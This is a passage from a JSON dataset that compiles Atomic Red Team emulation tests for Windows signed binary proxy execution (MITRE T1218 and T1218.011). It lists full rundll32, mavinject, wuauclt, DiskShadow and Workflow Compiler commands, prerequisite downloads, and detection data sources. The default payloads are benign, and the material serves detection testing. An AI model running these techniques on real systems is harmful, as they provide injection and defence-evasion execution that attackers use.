Upon execution, a windows saying \"installation failed\" will be opened\n\nReference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "inf_to_execute": { + "description": "Local location of inf file", + "type": "String", + "default": "PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Inf file must exist on disk at specified location (#{inf_to_execute})\n", + "prereq_command": "if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf\" -OutFile \"#{inf_to_execute}\"\n" + } + ], + "executor": { + "command": "rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\\#{inf_to_execute}\n", + "name": "command_prompt" + } + }, + { + "name": "Execution of HTA and VBS Files using Rundll32 and URL.dll", + "auto_generated_guid": "22cfde89-befe-4e15-9753-47306b37a6e3", + "description": "IcedID uses this TTP as follows:\n rundll32.exe url.dll,OpenURL %PUBLIC%\\index.hta\nTrickbot uses this TTP as follows:\n rundll32.exe URL.dll,FileProtocolHandler C:\\\\..\\\\Detail\\\\akteullen.vbs\n\nIn this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with \"rundll32 spawned wscript\"\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "rundll32.exe url.dll,OpenURL PathToAtomicsFolder\\T1218.011\\src\\index.hta\nrundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\\T1218.011\\src\\akteullen.vbs\n", + "name": "command_prompt" + } + }, + { + "name": "Launches an executable using Rundll32 and pcwutl.dll", + "auto_generated_guid": 
"9f5d081a-ee5a-42f9-a04e-b7bdc487e676", + "description": "Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "exe_to_launch": { + "description": "Path of the executable to launch", + "type": "Path", + "default": "%windir%\\System32\\notepad.exe" + } + }, + "executor": { + "command": "rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch}\n", + "name": "command_prompt" + } + }, + { + "name": "Execution of non-dll using rundll32.exe", + "auto_generated_guid": "ae3a8605-b26e-457c-b6b3-2702fd335bac", + "description": "Rundll32.exe running non-dll \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_url": { + "description": "Url to download the DLL", + "type": "Url", + "default": "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll" + }, + "input_file": { + "description": "Non-dll file", + "type": "String", + "default": "C:\\Users\\$env:username\\Downloads\\calc.png" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Non-dll file must exist on disk at specified location\n", + "prereq_command": "if (Test-Path #{input_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"#{input_url}\" -OutFile \"#{input_file}\"\n" + } + ], + "executor": { + "name": "powershell", + "command": "rundll32.exe #{input_file}, StartW\n" + } + }, + { + "name": "Rundll32 with Ordinal Value", + "auto_generated_guid": "9fd5a74b-ba89-482a-8a3e-a5feaa3697b0", + "description": "Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer. 
\nUpon successful execution, Calc.exe will spawn.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_url": { + "description": "Url to download the DLL", + "type": "Url", + "default": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/bin/AllTheThingsx64.dll" + }, + "input_file": { + "description": "DLL File", + "type": "String", + "default": "PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx64.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "DLL file must exist on disk at specified location\n", + "prereq_command": "if (Test-Path #{input_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"#{input_url}\" -OutFile \"#{input_file}\"\n" + } + ], + "executor": { + "name": "command_prompt", + "command": "rundll32.exe #{input_file},#2\n" + } + }, + { + "name": "Rundll32 with Control_RunDLL", + "auto_generated_guid": "e4c04b6f-c492-4782-82c7-3bf75eb8077e", + "description": "Rundll32.exe loading dll with 'control_rundll' within the command-line, loading a .cpl or another file type related to CVE-2021-40444. 
\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_url": { + "description": "Url to download the DLL", + "type": "Url", + "default": "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll" + }, + "input_file": { + "description": "DLL File", + "type": "String", + "default": "PathToAtomicsFolder\\T1047\\bin\\calc.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "DLL file must exist on disk at specified location\n", + "prereq_command": "if (Test-Path #{input_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"#{input_url}\" -OutFile \"#{input_file}\"\n" + } + ], + "executor": { + "name": "command_prompt", + "command": "rundll32.exe shell32.dll,Control_RunDLL #{input_file}\n" + } + }, + { + "name": "Rundll32 with desk.cpl", + "auto_generated_guid": "83a95136-a496-423c-81d3-1c6750133917", + "description": "Rundll32.exe loading an executable renamed as .scr using desk.cpl \nReference: \n - [LOLBAS - Libraries/Desk](https://lolbas-project.github.io/lolbas/Libraries/Desk/)\nSIGMA rules:\n - [SCR File Write Event](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/file_event_win_new_src_file.yml)\n - [Rundll32 InstallScreenSaver Execution](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_rundll32_installscreensaver.yml)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "exe_to_launch": { + "description": "Path of the executable to launch", + "type": "Path", + "default": "%windir%\\System32\\calc.exe" + } + }, + "executor": { + "name": "command_prompt", + "command": "copy #{exe_to_launch} not_an_scr.scr\nrundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr\n", + "cleanup_command": "del not_an_scr.scr" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of 
computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + 
"container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1218", + "command_list": [ + "mavinject.exe 1000 /INJECTRUNNING #{dll_payload}\n", + "mavinject.exe #{process_id} /INJECTRUNNING PathToAtomicsFolder\\T1218\\src\\x64\\T1218.dll\n", + "SyncAppvPublishingServer.exe \"n; Start-Process calc.exe\"\n", + "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path PathToAtomicsFolder\\T1218\\src\\Win32\\T1218-2.dll\n", + "InfDefaultInstall.exe 
PathToAtomicsFolder\\T1218\\src\\Infdefaultinstall.inf\n", + "FOR /F \"tokens=2*\" %a in ('reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\Winword.exe\" /V PATH') do set microsoft_wordpath=%b\ncall \"%microsoft_wordpath%\\protocolhandler.exe\" \"ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx\"\n", + "#{mwcpath}\\#{mwcname} \"PathToAtomicsFolder\\T1218\\src\\T1218.xml\" output.txt\n", + "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\#{mwcname} \"#{xml_payload}\" output.txt\n", + "#{mwcpath}\\microsoft.workflow.compiler.exe \"#{xml_payload}\" output.txt\n", + "#{renamed_binary} PathToAtomicsFolder\\T1218\\src\\T1218.xml output.txt\n", + "PathToAtomicsFolder\\T1218\\src\\svchost.exe #{xml_payload} output.txt\n", + "#{renamed_binary} #{xml_payload} output.txt\n", + "Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName foo -ModulePath #{module_path}", + "Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath $PWD", + "#{dspath} -S PathToAtomicsFolder\\T1218\\src\\T1218.txt \n", + "C:\\Windows\\System32\\diskshadow.exe -S #{txt_payload} \n", + "wuauclt.exe /UpdateDeploymentProvider PathToAtomicsFolder\\T1218\\bin\\calc.dll /RunHandlerComServer\n", + "Gpscript /logon\n", + "Gpscript /startup\n", + "copy #{Path_ie4uinit} %TEMP%\\ie4uinit.exe\ncopy PathToAtomicsFolder\\T1218\\src\\ieuinit.inf %TEMP%\\ieuinit.inf\n%TEMP%\\ie4uinit.exe -BaseSettings\n", + "copy c:\\windows\\system32\\ie4uinit.exe %TEMP%\\ie4uinit.exe\ncopy #{Path_inf} %TEMP%\\ieuinit.inf\n%TEMP%\\ie4uinit.exe -BaseSettings\n", + "mavinject.exe|SyncAppvPublishingServer.exe" + ], + "commands": [ + { + "command": "mavinject.exe 1000 /INJECTRUNNING #{dll_payload}\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "mavinject.exe #{process_id} /INJECTRUNNING PathToAtomicsFolder\\T1218\\src\\x64\\T1218.dll\n", + 
"source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "SyncAppvPublishingServer.exe \"n; Start-Process calc.exe\"\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path PathToAtomicsFolder\\T1218\\src\\Win32\\T1218-2.dll\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "InfDefaultInstall.exe PathToAtomicsFolder\\T1218\\src\\Infdefaultinstall.inf\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "FOR /F \"tokens=2*\" %a in ('reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\Winword.exe\" /V PATH') do set microsoft_wordpath=%b\ncall \"%microsoft_wordpath%\\protocolhandler.exe\" \"ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx\"\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "#{mwcpath}\\#{mwcname} \"PathToAtomicsFolder\\T1218\\src\\T1218.xml\" output.txt\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\#{mwcname} \"#{xml_payload}\" output.txt\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "#{mwcpath}\\microsoft.workflow.compiler.exe \"#{xml_payload}\" output.txt\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "#{renamed_binary} PathToAtomicsFolder\\T1218\\src\\T1218.xml output.txt\n", + "source": "atomics/T1218/T1218.yaml", + "name": 
"Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "PathToAtomicsFolder\\T1218\\src\\svchost.exe #{xml_payload} output.txt\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "#{renamed_binary} #{xml_payload} output.txt\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName foo -ModulePath #{module_path}", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath $PWD", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "#{dspath} -S PathToAtomicsFolder\\T1218\\src\\T1218.txt \n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "C:\\Windows\\System32\\diskshadow.exe -S #{txt_payload} \n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "wuauclt.exe /UpdateDeploymentProvider PathToAtomicsFolder\\T1218\\bin\\calc.dll /RunHandlerComServer\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "Gpscript /logon\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "Gpscript /startup\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "copy #{Path_ie4uinit} %TEMP%\\ie4uinit.exe\ncopy PathToAtomicsFolder\\T1218\\src\\ieuinit.inf %TEMP%\\ieuinit.inf\n%TEMP%\\ie4uinit.exe -BaseSettings\n", + "source": "atomics/T1218/T1218.yaml", + "name": 
"Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "copy c:\\windows\\system32\\ie4uinit.exe %TEMP%\\ie4uinit.exe\ncopy #{Path_inf} %TEMP%\\ieuinit.inf\n%TEMP%\\ie4uinit.exe -BaseSettings\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "mavinject.exe|SyncAppvPublishingServer.exe", + "source": "SysmonHunter - Signed Binary Proxy Execution", + "name": "" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1218", + "display_name": "Signed Binary Proxy Execution", + "atomic_tests": [ + { + "name": "mavinject - Inject DLL into running process", + "auto_generated_guid": "c426dacf-575d-4937-8611-a148a86a5e61", + "description": "Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "process_id": { + "description": "PID of process receiving injection", + "type": "String", + "default": "1000" + }, + "dll_payload": { + "description": "DLL to inject", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218\\src\\x64\\T1218.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "T1218.dll must exist on disk at specified location (#{dll_payload})\n", + "prereq_command": "if (Test-Path #{dll_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll\" -OutFile \"#{dll_payload}\"\n" + } + ], + "executor": { + "command": "mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "SyncAppvPublishingServer - Execute arbitrary PowerShell code", + "auto_generated_guid": "d590097e-d402-44e2-ad72-2c6aa1ce78b1", + "description": "Executes 
arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "powershell_code": { + "description": "PowerShell code to execute", + "type": "String", + "default": "Start-Process calc.exe" + } + }, + "executor": { + "command": "SyncAppvPublishingServer.exe \"n; #{powershell_code}\"\n", + "name": "command_prompt" + } + }, + { + "name": "Register-CimProvider - Execute evil dll", + "auto_generated_guid": "ad2c17ed-f626-4061-b21e-b9804a6f3655", + "description": "Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dll_payload": { + "description": "DLL to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218\\src\\Win32\\T1218-2.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "T1218-2.dll must exist on disk at specified location (#{dll_payload})\n", + "prereq_command": "if (Test-Path #{dll_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll\" -OutFile \"#{dll_payload}\"\n" + } + ], + "executor": { + "command": "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path #{dll_payload}\n", + "name": "command_prompt" + } + }, + { + "name": "InfDefaultInstall.exe .inf Execution", + "auto_generated_guid": "54ad7d5a-a1b5-472c-b6c4-f8090fb2daef", + "description": "Test execution of a .inf using InfDefaultInstall.exe\n\nReference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "inf_to_execute": { + "description": "Local location of inf file", + "type": "String", + "default": 
"PathToAtomicsFolder\\T1218\\src\\Infdefaultinstall.inf" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "INF file must exist on disk at specified location (#{inf_to_execute})\n", + "prereq_command": "if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf\" -OutFile \"#{inf_to_execute}\"\n" + } + ], + "executor": { + "command": "InfDefaultInstall.exe #{inf_to_execute}\n", + "name": "command_prompt" + } + }, + { + "name": "ProtocolHandler.exe Downloaded a Suspicious File", + "auto_generated_guid": "db020456-125b-4c8b-a4a7-487df8afb5a2", + "description": "Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_url": { + "description": "url to document", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided\n", + "prereq_command": "if (Test-Path \"(Resolve-Path \"C:\\Program Files*\\Microsoft Office\\root\\Office16\")\\protocolhandler.exe\") {exit 0} else {exit 1}\n", + "get_prereq_command": "write-host \"Install Microsoft Word or provide correct path.\"\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "FOR /F \"tokens=2*\" %a in ('reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\Winword.exe\" /V PATH') do set microsoft_wordpath=%b\ncall 
\"%microsoft_wordpath%\\protocolhandler.exe\" \"ms-word:nft|u|#{remote_url}\"\n" + } + }, + { + "name": "Microsoft.Workflow.Compiler.exe Payload Execution", + "auto_generated_guid": "7cbb0f26-a4c1-4f77-b180-a009aa05637e", + "description": "Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "xml_payload": { + "description": "XML to execution", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218\\src\\T1218.xml" + }, + "mwcpath": { + "description": "Default location of Microsoft.Workflow.Compiler.exe", + "type": "Path", + "default": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319" + }, + "mwcname": { + "description": "Default name of microsoft.workflow.compiler.exe", + "type": "Path", + "default": "microsoft.workflow.compiler.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": ".Net must be installed for this test to work correctly.\n", + "prereq_command": "if (Test-Path #{mwcpath}\\#{mwcname} ) {exit 0} else {exit 1}\n", + "get_prereq_command": "write-host \".Net must be installed for this test to work correctly.\"\n" + } + ], + "executor": { + "command": "#{mwcpath}\\#{mwcname} \"#{xml_payload}\" output.txt\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Renamed Microsoft.Workflow.Compiler.exe Payload Executions", + "auto_generated_guid": "4cc40fd7-87b8-4b16-b2d7-57534b86b911", + "description": "Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "xml_payload": { + "description": "XML to execution", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218\\src\\T1218.xml" + }, + "renamed_binary": { + "description": "renamed Microsoft.Workflow.Compiler", + "type": "Path", + "default": 
"PathToAtomicsFolder\\T1218\\src\\svchost.exe" + }, + "mwcpath": { + "description": "Default location of Microsoft.Workflow.Compiler.exe", + "type": "Path", + "default": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319" + }, + "mwcname": { + "description": "Default name of microsoft.workflow.compiler.exe", + "type": "Path", + "default": "microsoft.workflow.compiler.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": ".Net must be installed for this test to work correctly.\n", + "prereq_command": "Copy-Item #{mwcpath}\\#{mwcname} \"#{renamed_binary}\" -Force\nif (Test-Path \"#{renamed_binary}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "write-host \"you need to rename workflow complier before you run this test\"\n" + } + ], + "executor": { + "command": "#{renamed_binary} #{xml_payload} output.txt\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Invoke-ATHRemoteFXvGPUDisablementCommand base test", + "auto_generated_guid": "9ebe7901-7edf-45c0-b5c7-8366300919db", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).\n\nOne of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as \"PowerShell module load-order hijacking\" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. 
Upon execution the temporary module is deleted.\n\nInvoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command-line. PowerShell code execution is triggered when supplying the \"Disable\" argument to RemoteFXvGPUDisablement.exe.\n\nThe Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts.\n\nReference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "module_name": { + "description": "Specifies a temporary module name to use. If -ModuleName is not supplied, a 16-character random temporary module name is used. A PowerShell module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses module load order, a module name must be specified.", + "type": "String", + "default": "foo" + }, + "module_path": { + "description": "Specifies an alternate, non-default PowerShell module path for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the first entry in %PSModulePath% will be used. 
Typically, this is %USERPROFILE%\\Documents\\WindowsPowerShell\\Modules.", + "type": "String", + "default": "$PWD" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}", + "name": "powershell" + } + }, + { + "name": "DiskShadow Command Execution", + "auto_generated_guid": "0e1483ba-8f0c-425d-b8c6-42736e058eaa", + "description": "Emulates attack with a DiskShadow.exe (LOLBIN installed by default on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "txt_payload": { + "description": "txt to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218\\src\\T1218.txt" + }, + "dspath": { + "description": "Default location of DiskShadow.exe", + "type": "Path", + "default": "C:\\Windows\\System32\\diskshadow.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "txt file must exist on disk at specified location (#{txt_payload})", + "prereq_command": "if (Test-Path #{txt_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{txt_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt\" -OutFile 
\"#{txt_payload}\"\n" + }, + { + "description": "DiskShadow.exe must exist on disk at specified location (#{dspath})", + "prereq_command": "if (Test-Path #{dspath}) {exit 0} else {exit 1}\n", + "get_prereq_command": "echo \"DiskShadow.exe not found on disk at expected location\"\n" + } + ], + "executor": { + "command": "#{dspath} -S #{txt_payload} \n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Load Arbitrary DLL via Wuauclt (Windows Update Client)", + "auto_generated_guid": "49fbd548-49e9-4bb7-94a6-3769613912b8", + "description": "This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. \nSee https://dtm.uk/wuauclt/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "arbitrary_dll": { + "description": "Path of DLL to be loaded", + "type": "String", + "default": "PathToAtomicsFolder\\T1218\\bin\\calc.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "DLL to load must exist on disk as specified location (#{arbitrary_dll})\n", + "prereq_command": "if (test-path \"#{arbitrary_dll}\"){exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{arbitrary_dll}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true\" -OutFile \"#{arbitrary_dll}\"\n" + } + ], + "executor": { + "command": "wuauclt.exe /UpdateDeploymentProvider #{arbitrary_dll} /RunHandlerComServer\n", + "cleanup_command": "taskkill /f /im calculator.exe > nul 2>&1", + "name": "command_prompt" + } + }, + { + "name": "Lolbin Gpscript logon option", + "auto_generated_guid": "5bcda9cd-8e85-48fa-861d-b5a85d91d48c", + "description": "Executes logon scripts configured in Group Policy.\nhttps://lolbas-project.github.io/lolbas/Binaries/Gpscript/\nhttps://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/\n", + 
